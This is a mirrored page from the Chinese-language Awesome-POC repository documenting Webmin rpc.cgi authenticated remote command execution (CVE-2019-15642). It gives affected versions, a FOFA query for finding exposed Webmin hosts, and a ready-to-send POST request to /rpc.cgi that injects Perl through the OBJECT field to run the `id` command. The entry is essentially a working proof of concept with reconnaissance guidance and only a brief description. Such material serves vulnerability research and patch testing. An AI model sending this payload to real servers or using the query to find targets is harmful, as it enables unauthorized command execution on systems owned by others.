admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642.md
Threekiii cba0c4db58 更新漏洞
2022-12-05 11:09:28 +08:00

34 lines
705 B
Markdown
Raw Blame History

# Webmin rpc.cgi 后台远程命令执行漏洞 CVE-2019-15642
## 漏洞描述
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。
## 漏洞影响
```
Webmin < 1.920
```
## FOFA
```
app="webmin"
```
## 漏洞复现
登录页面
![image-20220829101939637](./images/202208291021846.png)
登录后发送请求包
```
POST /rpc.cgi
Referer: https://xxx.xxx.xxx.xxx/sysinfo.cgi?xnavigation=1
OBJECT Socket;print "Content-Type: text/plain\n\n";$cmd=`id`;print "$cmd\n\n";
```
![image-20220829102134685](./images/202208291021740.png)
Reference in New Issue View Git Blame Copy Permalink